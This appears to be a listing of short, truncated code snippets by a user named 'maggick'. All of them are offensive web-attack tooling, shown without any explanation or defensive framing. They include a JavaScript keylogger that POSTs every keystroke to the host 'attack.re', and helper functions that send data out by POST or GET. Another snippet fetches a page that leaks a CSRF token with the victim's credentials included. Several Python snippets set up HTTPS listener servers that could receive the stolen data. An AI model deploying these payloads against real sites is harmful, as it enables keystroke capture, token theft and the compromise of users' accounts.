maggick

let POST = function(url, params) {
  let http = new XMLHttpRequest();
  http.open('POST', url, true);
  http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
  http.send(params);
};

function logKey(e) {
  k += ` ${e.key}`;
  POST('https://attack.re', k);

maggick

function post(url, params) {
  let http = new XMLHttpRequest();
  http.open('POST', url, true);
  http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
  http.send(params);
};

function get(url, params) {
  let http = new XMLHttpRequest();
  http.open('GET', url+'/?a='+params, true);

maggick

# python3
# generate server.pem certificate with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

import http.server, ssl

server_address = ('0.0.0.0', 443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
                               server_side=True,

maggick

await fetch('https://subdomain.domain.com/page_leaking_csrf_token',{
   method: 'GET',
   headers: {
       'Content-Length': '2'
   },
   credentials: 'include'
}).then((response) => {
   a=response;
});

maggick

# python3
# generate server.pem certificate with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

import ssl
from http.server import HTTPServer, BaseHTTPRequestHandler

class MyHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # send 200 response

maggick

# python3
# generate server.pem certificate with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

import http.server, ssl, json
from http.server import BaseHTTPRequestHandler, HTTPServer

class MyHandler(BaseHTTPRequestHandler):

    def do_GET(self):